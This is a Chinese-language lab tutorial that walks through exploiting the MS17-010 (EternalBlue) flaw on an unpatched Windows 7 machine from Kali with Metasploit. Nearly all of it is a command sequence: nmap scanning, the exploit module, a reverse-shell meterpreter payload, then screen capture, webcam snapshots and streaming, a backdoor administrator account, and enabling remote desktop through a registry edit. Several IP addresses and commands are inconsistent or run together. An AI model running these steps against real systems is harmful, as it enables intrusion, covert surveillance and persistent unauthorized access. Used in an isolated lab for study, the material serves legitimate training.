本机ip:192.168.116.128(kali)
靶机ip:192.168.116.129(win7. x64)
##禁止转载-------所有权:枕书
准备工作:
准备一台kali主机和一台win7主机,前者负责攻击,后者为靶机,靶机需为win7系统并且没有安装补丁(即需要开启445端口)
查看靶机ip
打开kali,通过nmap扫描同网段下的所有主机
nmap 192.168.116.1/24 //扫描主机的端口开放情况
启动msfconsole工具
msfconsole //启动命令
msfconsole
搜索ms17_010漏洞,本次使用第三条进行测试(状态为yes的都可使用)
search ms17_010
使用永恒之蓝漏洞,使用use 名称命令进行使用。
use exploit/windows/smb/ms17_010_eternalblue
显示所需要的参数
show options
设置目标主机ip
set rhost 192.168.116.129
设置攻击载体(设置该载体进行攻击成功后我们可以使用这个模块自带的各种攻击模块)。
set payload windows/x64/meterpreter/reverse_tcp
设置本机ip
set lhost 192.168.1.128
查看设置的参数,以确保参数正确
show options
执行漏洞(当出现以下情况,说明成绩已经成功,接下来我们就可以进行文件的上传下载,截取屏幕,获取密码,使用摄像头拍照, 远程桌面连接等操作。)
run
成功渗透后输入命令
//截取屏幕
screenshot
//用摄像头拍照
webcam_snap
//用摄像头开视频
webcam_stream
//创建新用户Hack
netuser Hack 123456 /add
//将用户Hack添加至管理员组
netlocalgroup administrators Hack /add
开启远程桌面功能
REGADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 0 /f
kali 远程桌面连接Win7
rdesktop192.168.23.133:3389